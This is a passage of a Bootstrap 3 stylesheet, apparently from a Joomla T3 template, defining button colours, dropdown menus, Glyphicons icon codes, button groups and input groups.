}
.btn-info:active:hover,
.btn-info.active:hover,
.open > .dropdown-toggle.btn-info:hover,
.btn-info:active:focus,
.btn-info.active:focus,
.open > .dropdown-toggle.btn-info:focus,
.btn-info:active.focus,
.btn-info.active.focus,
.open > .dropdown-toggle.btn-info.focus {
  color: #ffffff;
  background-color: #005875;
  border-color: #002633;
}
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled.focus,
.btn-info[disabled].focus,
fieldset[disabled] .btn-info.focus {
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info .badge {
  color: #0099cc;
  background-color: #ffffff;
}
.btn-warning {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning:focus,
.btn-warning.focus {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #663600;
}
.btn-warning:hover {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #cc6d00;
  background-image: none;
  border-color: #a85a00;
}
.btn-warning:active:hover,
.btn-warning.active:hover,
.open > .dropdown-toggle.btn-warning:hover,
.btn-warning:active:focus,
.btn-warning.active:focus,
.open > .dropdown-toggle.btn-warning:focus,
.btn-warning:active.focus,
.btn-warning.active.focus,
.open > .dropdown-toggle.btn-warning.focus {
  color: #ffffff;
  background-color: #a85a00;
  border-color: #663600;
}
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled.focus,
.btn-warning[disabled].focus,
fieldset[disabled] .btn-warning.focus {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-danger {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger:focus,
.btn-danger.focus {
  color: #ffffff;
  background-color: #990000;
  border-color: #330000;
}
.btn-danger:hover {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #990000;
  background-image: none;
  border-color: #750000;
}
.btn-danger:active:hover,
.btn-danger.active:hover,
.open > .dropdown-toggle.btn-danger:hover,
.btn-danger:active:focus,
.btn-danger.active:focus,
.open > .dropdown-toggle.btn-danger:focus,
.btn-danger:active.focus,
.btn-danger.active.focus,
.open > .dropdown-toggle.btn-danger.focus {
  color: #ffffff;
  background-color: #750000;
  border-color: #330000;
}
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled.focus,
.btn-danger[disabled].focus,
fieldset[disabled] .btn-danger.focus {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-link {
  font-weight: 400;
  color: #cc0000;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link.active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #800000;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #999999;
  text-decoration: none;
}
.btn-lg,
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.btn-sm,
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-xs,
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-block {
  display: block;
  width: 100%;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}
.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}

.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  -o-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
tr.collapse.in {
  display: table-row;
}
tbody.collapse.in {
  display: table-row-group;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition-property: height, visibility;
  transition-property: height, visibility;
  -webkit-transition-duration: 0.35s;
  transition-duration: 0.35s;
  -webkit-transition-timing-function: ease;
  transition-timing-function: ease;
}
@font-face {
  font-family: "Glyphicons Halflings";
  src: url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot");
  src: url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot?#iefix") format("embedded-opentype"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff2") format("woff2"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff") format("woff"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.ttf") format("truetype"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular") format("svg");
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: "Glyphicons Halflings";
  font-style: normal;
  font-weight: 400;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
  content: "\002a";
}
.glyphicon-plus:before {
  content: "\002b";
}
.glyphicon-euro:before,
.glyphicon-eur:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.glyphicon-cd:before {
  content: "\e201";
}
.glyphicon-save-file:before {
  content: "\e202";
}
.glyphicon-open-file:before {
  content: "\e203";
}
.glyphicon-level-up:before {
  content: "\e204";
}
.glyphicon-copy:before {
  content: "\e205";
}
.glyphicon-paste:before {
  content: "\e206";
}
.glyphicon-alert:before {
  content: "\e209";
}
.glyphicon-equalizer:before {
  content: "\e210";
}
.glyphicon-king:before {
  content: "\e211";
}
.glyphicon-queen:before {
  content: "\e212";
}
.glyphicon-pawn:before {
  content: "\e213";
}
.glyphicon-bishop:before {
  content: "\e214";
}
.glyphicon-knight:before {
  content: "\e215";
}
.glyphicon-baby-formula:before {
  content: "\e216";
}
.glyphicon-tent:before {
  content: "\26fa";
}
.glyphicon-blackboard:before {
  content: "\e218";
}
.glyphicon-bed:before {
  content: "\e219";
}
.glyphicon-apple:before {
  content: "\f8ff";
}
.glyphicon-erase:before {
  content: "\e221";
}
.glyphicon-hourglass:before {
  content: "\231b";
}
.glyphicon-lamp:before {
  content: "\e223";
}
.glyphicon-duplicate:before {
  content: "\e224";
}
.glyphicon-piggy-bank:before {
  content: "\e225";
}
.glyphicon-scissors:before {
  content: "\e226";
}
.glyphicon-bitcoin:before {
  content: "\e227";
}
.glyphicon-btc:before {
  content: "\e227";
}
.glyphicon-xbt:before {
  content: "\e227";
}
.glyphicon-yen:before {
  content: "\00a5";
}
.glyphicon-jpy:before {
  content: "\00a5";
}
.glyphicon-ruble:before {
  content: "\20bd";
}
.glyphicon-rub:before {
  content: "\20bd";
}
.glyphicon-scale:before {
  content: "\e230";
}
.glyphicon-ice-lolly:before {
  content: "\e231";
}
.glyphicon-ice-lolly-tasted:before {
  content: "\e232";
}
.glyphicon-education:before {
  content: "\e233";
}
.glyphicon-option-horizontal:before {
  content: "\e234";
}
.glyphicon-option-vertical:before {
  content: "\e235";
}
.glyphicon-menu-hamburger:before {
  content: "\e236";
}
.glyphicon-modal-window:before {
  content: "\e237";
}
.glyphicon-oil:before {
  content: "\e238";
}
.glyphicon-grain:before {
  content: "\e239";
}
.glyphicon-sunglasses:before {
  content: "\e240";
}
.glyphicon-text-size:before {
  content: "\e241";
}
.glyphicon-text-color:before {
  content: "\e242";
}
.glyphicon-text-background:before {
  content: "\e243";
}
.glyphicon-object-align-top:before {
  content: "\e244";
}
.glyphicon-object-align-bottom:before {
  content: "\e245";
}
.glyphicon-object-align-horizontal:before {
  content: "\e246";
}
.glyphicon-object-align-left:before {
  content: "\e247";
}
.glyphicon-object-align-vertical:before {
  content: "\e248";
}
.glyphicon-object-align-right:before {
  content: "\e249";
}
.glyphicon-triangle-right:before {
  content: "\e250";
}
.glyphicon-triangle-left:before {
  content: "\e251";
}
.glyphicon-triangle-bottom:before {
  content: "\e252";
}
.glyphicon-triangle-top:before {
  content: "\e253";
}
.glyphicon-console:before {
  content: "\e254";
}
.glyphicon-superscript:before {
  content: "\e255";
}
.glyphicon-subscript:before {
  content: "\e256";
}
.glyphicon-menu-left:before {
  content: "\e257";
}
.glyphicon-menu-right:before {
  content: "\e258";
}
.glyphicon-menu-down:before {
  content: "\e259";
}
.glyphicon-menu-up:before {
  content: "\e260";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 2px;
  vertical-align: middle;
  border-top: 4px dashed;
  border-top: 4px solid \9;
  border-right: 4px solid transparent;
  border-left: 4px solid transparent;
}
.dropup,
.dropdown {
  position: relative;
}
.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  left: 0;
  z-index: 1000;
  display: none;
  float: left;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  font-size: 14px;
  text-align: left;
  list-style: none;
  background-color: #444444;
  background-clip: padding-box;
  border: 1px solid #444444;
  border-radius: 0;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
}
.dropdown-menu.pull-right {
  right: 0;
  left: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #515151;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: 400;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #515151;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #373737;
  outline: 0;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-menu-right {
  right: 0;
  left: auto;
}
.dropdown-menu-left {
  right: auto;
  left: 0;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  right: 0;
  left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  content: "";
  border-top: 0;
  border-bottom: 4px dashed;
  border-bottom: 4px solid \9;
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 2px;
}
@media (min-width: 991px) {
  .navbar-right .dropdown-menu {
    right: 0;
    left: auto;
  }
  .navbar-right .dropdown-menu-left {
    right: auto;
    left: 0;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: left;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-left: -1px;
}
.btn-toolbar {
  margin-left: -5px;
}
.btn-toolbar .btn,
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
  float: left;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
  margin-left: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-left: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group > .btn-group {
  float: left;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
  padding-right: 8px;
  padding-left: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-right: 12px;
  padding-left: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-left: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-left: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  display: table-cell;
  float: none;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
.btn-group-justified > .btn-group .dropdown-menu {
  left: auto;
}
[data-toggle="buttons"] > .btn input[type="radio"],
[data-toggle="buttons"] > .btn-group > .btn input[type="radio"],
[data-toggle="buttons"] > .btn input[type="checkbox"],
[data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-right: 0;
  padding-left: 0;
}
.input-group .form-control {
  position: relative;
  z-index: 2;
  float: left;
  width: 100%;
  margin-bottom: 0;
}
.input-group .form-control:focus {
  z-index: 3;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: 400;
  line-height: 1;
  color: #666666;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #cccccc;
  border-radius: 0;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
